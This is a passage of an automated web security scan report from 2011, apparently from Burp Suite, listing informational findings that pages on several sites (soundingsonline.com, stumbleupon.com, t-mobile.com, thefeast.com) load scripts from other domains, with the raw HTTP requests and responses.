Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1295. http://www.soundingsonline.com/news/dispatches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/dispatches

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/dispatches HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1296. http://www.soundingsonline.com/news/home-waters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/home-waters

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/home-waters HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1297. http://www.soundingsonline.com/news/mishaps-a-rescues previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/mishaps-a-rescues HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:27:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:27:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1298. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; __utmc=1; __utmb=1.1.10.1295961240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D2; s_invisit=true; s_lv=1295961240451; s_lv_s=Less%20than%201%20day; s_sq=%5B%5BB%5D%5D; count=5

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:16:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 13:16:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1299. http://www.soundingsonline.com/news/sailing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/sailing

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/sailing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1300. http://www.soundingsonline.com/news/todays-top-stories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/todays-top-stories

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /news/todays-top-stories HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1301. http://www.soundingsonline.com/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/resources

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /resources HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1302. http://www.soundingsonline.com/site-map previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/site-map

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /site-map HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1303. http://www.soundingsonline.com/subscription-services previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /subscription-services HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1304. http://www.soundingsonline.com/subscription-services/preview-current-issue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/preview-current-issue

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /subscription-services/preview-current-issue HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

21.1305. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/subscribe-to-e-newsletter

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /subscription-services/subscribe-to-e-newsletter HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1306. http://www.standingcloud.com/growbusiness.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.standingcloud.com
Path:	/growbusiness.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /growbusiness.php HTTP/1.1
Host: www.standingcloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:38:08 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 10401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<link rel="stylesheet" href="css/validationEngine.jquery.css" type="text/css" media="screen" title="no title" charset="utf-8" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

21.1307. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://cdn.stumble-upon.com/js/attach_su.js?v=20110124-01
http://cdn.stumble-upon.com/js/plugins_su.js?v=20110124-01

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=et4p0cs6c4ufsh9057l6j77nm3; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=13426481494d3e53cc345a97.61014341; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=92463dc5d22c4f2ef5a9ff3749f7e1d8%7C%7C10%7C%7C1295930316%7C4385bda480c51506e13ba04652aa4a57; expires=Fri, 22-Jan-2021 04:38:36 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7324
Date: Tue, 25 Jan 2011 04:38:36 GMT
X-Varnish: 2659461572
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->


               <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110124-01"></script>
...[SNIP]...


       <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110124-01"></script>
...[SNIP]...

21.1308. http://www.t-mobile.com/Company/Community.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/Company/Community.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.mercent.com/js/tracker.js
http://libs.coremetrics.com/eluminate.js
http://s.tmocache.com/Js/Page.js
http://s.tmocache.com/assets/scripts/swfObject.js?v=634306440507445748
http://s.tmocache.com/htmlservices/assets/scripts/core.js?v=634306440836814424
http://s.tmocache.com/htmlservices/assets/scripts/jquery-1.3.2.min.js?v=634306440847282973
http://s.tmocache.com/htmlservices/assets/scripts/jquery.smartval.js?v=634306440855095323
http://s.tmocache.com/htmlservices/assets/scripts/tmobile.navigation.js?v=634306440863845155
http://s.tmocache.com/js/LivePersonChat.js

Request

Response

21.1309. http://www.thefeast.com/boston/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://www.nbcudigitaladops.com/hosted/global.js

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1310. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://platform.twitter.com/widgets.js
http://www.nbcudigitaladops.com/hosted/global.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1311. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefeast.com
Path:	/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://platform.twitter.com/widgets.js
http://www.nbcudigitaladops.com/hosted/global.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
